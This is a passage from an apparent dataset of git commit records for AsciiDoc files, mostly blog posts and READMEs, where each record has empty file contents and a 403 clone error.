'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78f58b07ebf527d033bf2004084cd633ead6788","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7496f474a843f6bf5cc81ea9dab6039811d4db9","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io,twentyTwo\/twentyTwo.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/twentyTwo\/twentyTwo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da8caaa4c8fc0b918566da913dee8d579a4fd77b","subject":"y2b create post New iPod Touch Unboxing (2015)","message":"y2b create post New iPod Touch Unboxing (2015)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-17-New-iPod-Touch-Unboxing-2015.adoc","new_file":"_posts\/2015-07-17-New-iPod-Touch-Unboxing-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ea9447801bd505fd115547a6e72bd0fc9daa560","subject":"y2b create post iPhone 6S Aluminum Bend Test","message":"y2b create post iPhone 6S Aluminum Bend Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-19-iPhone-6S-Aluminum-Bend-Test.adoc","new_file":"_posts\/2015-08-19-iPhone-6S-Aluminum-Bend-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8740f032345cd813781461d6814ea666583af89b","subject":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","message":"Update 2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"_posts\/2015-09-29-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c80d8bdc2a0ddc98baa465ea50dc984c144652ff","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed8a4a5fe158c100b166dbe27ca246cfab866076","subject":"add README.adoc","message":"add README.adoc\n","repos":"naipmoro\/lofmm","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/naipmoro\/lofmm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3110ebeee8a23cda0d4cda328e27d09254e57104","subject":"Add readme","message":"Add readme\n","repos":"gentoo-ansible\/role-owncloud,jirutka\/ansible-role-owncloud","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ansible-role-owncloud.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c941b70b752cd8d19e48b709d7265c2e9656dd7b","subject":"\u66f4\u65b0readme","message":"\u66f4\u65b0readme\n","repos":"liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b71c7335e1f0721c5cdd35864cf5b596236cb44","subject":"Updated documentation","message":"Updated documentation","repos":"resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,drmaas\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15965415b6d70d393767ecd53ab8f27344dc9dfc","subject":"Add docs for the java main sti image.","message":"Add docs for the java main sti image.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/sti_images\/java.adoc","new_file":"using_images\/sti_images\/java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9425a508c6f72d3d632e3a30958a5ce5fc51c998","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/delete-worker\/http-response.adoc","new_file":"xill-web-service\/tmp-test\/delete-worker\/http-response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"378f09ae8a6167e369bff4f1ee8dfbca7aef5afc","subject":"Documentation on tree merge function","message":"Documentation on tree merge function\n","repos":"bio-org-au\/services,bio-org-au\/services,bio-org-au\/services","old_file":"doc\/merge-tree.adoc","new_file":"doc\/merge-tree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bio-org-au\/services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ee3a22cbe3d0b9d855ba6915970226e1c116463e","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ad74b1dd64d3a35ef3eb6de44b6d85cee869489","subject":"Update 2017-10-25-Creation-dun-mail-HTML.adoc","message":"Update 2017-10-25-Creation-dun-mail-HTML.adoc","repos":"kosssi\/blog,kosssi\/blog,kosssi\/blog,kosssi\/blog","old_file":"_posts\/2017-10-25-Creation-dun-mail-HTML.adoc","new_file":"_posts\/2017-10-25-Creation-dun-mail-HTML.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kosssi\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20dc752995af6e99af82481f38f6ed1368b059bf","subject":"Added README.","message":"Added README.\n","repos":"jprichardson\/buzz,jprichardson\/buzz","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jprichardson\/buzz.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e6dae4175489f90aa834b5ba22127eda82d8a75","subject":"compiled and fixed programs","message":"compiled and fixed programs\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7be1c3f08f22691a28118b8b59f013574a5be81c","subject":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","message":"Update 2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_file":"_posts\/2016-03-31-i-O-S-development-and-deployment-with-fastlane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eaaec9fe91a4c19eb7e3d7c14a430b7ab325dc0","subject":"Update 2015-10-31-The-Lost-Days.adoc","message":"Update 2015-10-31-The-Lost-Days.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_file":"_posts\/2015-10-31-The-Lost-Days.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c4c045606f83e0bfcb81e7dfce9260500217f4d","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f39fae2b37a5571f595b817a035794403b90d28","subject":"lecture #2: ip addressing & conversion hex\/bin\/dec","message":"lecture #2: ip addressing & conversion hex\/bin\/dec\n\nlecture #1 is on paper still\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture01_20170830.adoc","new_file":"lecture01_20170830.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfea66529915a125d0a3f69da45dc31fb5c045cb","subject":"Update 2017-05-17-Editeur-CSS-dans-Eclipse.adoc","message":"Update 2017-05-17-Editeur-CSS-dans-Eclipse.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2017-05-17-Editeur-CSS-dans-Eclipse.adoc","new_file":"_posts\/2017-05-17-Editeur-CSS-dans-Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74b20853be901b2f78b7829c98c1f5a4584680f3","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c0b42ccd74cd70f59170a39fe1f3edc53e740cb","subject":"Reformat: FAQs \u2192 Tips & Tricks","message":"Reformat: FAQs \u2192 Tips & Tricks\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a6dc620b00a7272807d8a8d4d78f355689cbd22d","subject":"CL note: Checking if a file or directory exists","message":"CL note: Checking if a file or directory exists\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3860c533ab6a52a888793ae9e6c209b15f5c3ed4","subject":"cl: string to symbol and function","message":"cl: string to symbol and function\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0d8ddbf03dffcba616ed020072324c05f48a1801","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b981848e2b97e3540470d747ff39ca1c01a8bdec","subject":"Update 2015-05-04-Hello-World.adoc","message":"Update 2015-05-04-Hello-World.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-04-Hello-World.adoc","new_file":"_posts\/2015-05-04-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1237535963ef57edcb01b8f9b6b24a28c2fad3b","subject":"Update 2016-03-02-My-new-post.adoc","message":"Update 2016-03-02-My-new-post.adoc","repos":"sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress,sharmivssharmi\/sharmipress","old_file":"_posts\/2016-03-02-My-new-post.adoc","new_file":"_posts\/2016-03-02-My-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sharmivssharmi\/sharmipress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faf34f58c68a4f6a3fbad42ff1650729bc847e3","subject":"Update 2016-07-09-Version-166.adoc","message":"Update 2016-07-09-Version-166.adoc","repos":"eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io,eunas\/eunas.github.io","old_file":"_posts\/2016-07-09-Version-166.adoc","new_file":"_posts\/2016-07-09-Version-166.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eunas\/eunas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec854d9d2786f9229a556e1fbb306bcabf78f728","subject":"\u91cd\u8907\u306e\u305f\u3081\u524a\u9664","message":"\u91cd\u8907\u306e\u305f\u3081\u524a\u9664","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2beb848d609071d5075af04fb1339d4b6bc79292","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d048535d26e7d8869b88d402b0dd21d08eef46","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"178ddd0ac3d05f2b43ae16410e98fa4f9909cac1","subject":"add generated file","message":"add generated file\n","repos":"bjartek\/vertx-rx,bjartek\/vertx-rx","old_file":"rx-java\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"rx-java\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjartek\/vertx-rx.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55e8fb5a57a548f9e78fcc1ef4d4b72edaa6141d","subject":"Update 2016-05-04-Second-Post.adoc","message":"Update 2016-05-04-Second-Post.adoc","repos":"lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io","old_file":"_posts\/2016-05-04-Second-Post.adoc","new_file":"_posts\/2016-05-04-Second-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lyqiangmny\/lyqiangmny.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8383df04027fa8a9fdd9b801cc03baca63810509","subject":"y2b create post PlayStation Vita Unboxing (PS Vita)","message":"y2b create post PlayStation Vita Unboxing (PS Vita)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-23-PlayStation-Vita-Unboxing-PS-Vita.adoc","new_file":"_posts\/2011-12-23-PlayStation-Vita-Unboxing-PS-Vita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94c94cb1d59ac0b3b904ada07636297217c0e07d","subject":"Cleaning","message":"Cleaning\n","repos":"CyrilSahula\/REST-API-Doc","old_file":"src\/main\/resources\/doc-api-adoc\/index.adoc","new_file":"src\/main\/resources\/doc-api-adoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CyrilSahula\/REST-API-Doc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"71576712f33555dc493dd767bed90b300ae35eb9","subject":"create post What If You Could Get AirPods For Only $40?","message":"create post What If You Could Get AirPods For Only $40?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-What-If-You-Could-Get-AirPods-For-Only-40?.adoc","new_file":"_posts\/2018-02-26-What-If-You-Could-Get-AirPods-For-Only-40?.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84eefa89bf9d738b79e6ec96b5ff72a74135966d","subject":"README: update Eclipse information","message":"README: update Eclipse information\n\nI upgraded to Eclipse 8.7.0. They finally fixed the long-standing indexer\nbug that caused indexing LLVM to hang outright, but there are still enough\nindexing errors that it should be excluded.\n\nChange-Id: Id91ecea1af670e5871174884b19662c063e2250c\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/7092\nTested-by: jenkins\nReviewed-by: David Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6fe2d30c88de984cf7d7805c7949310103b73bf6","subject":"Adding a README","message":"Adding a README\n","repos":"danhaywood\/java-assertjext,danhaywood\/java-assertjext","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danhaywood\/java-assertjext.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9bfc5dd90ec68aa560f79326e3567a858866cb5","subject":"Metrics specific logging conventions doc","message":"Metrics specific logging conventions doc\n","repos":"jotak\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,tsegismont\/hawkular-metrics,spadgett\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,ppalaga\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,hawkular\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94145a86efc4abde844798de2ef4d0085e1691e2","subject":"Update 2015-02-24-new-post.adoc","message":"Update 2015-02-24-new-post.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-new-post.adoc","new_file":"_posts\/2015-02-24-new-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42a383131353c4a94a0fd7a5ef4b93b7d98ca5e5","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a82925b3bd6f4a8e692702ba08724ce9ab8e8ebd","subject":"Updated links to maven repo to use https. Closes elastic\/elasticsearch#495.","message":"Updated links to maven repo to use https. Closes elastic\/elasticsearch#495.\n\nOriginal commit: elastic\/x-pack-elasticsearch@f95bdea57efa59e8e033c946d9c2030930cc467f\n","repos":"vroyer\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra","old_file":"shield\/docs\/public\/configuring-clients-integrations\/java.asciidoc","new_file":"shield\/docs\/public\/configuring-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18c6a2c1f8613e0d40661ead23bfb7005bebbc4c","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING 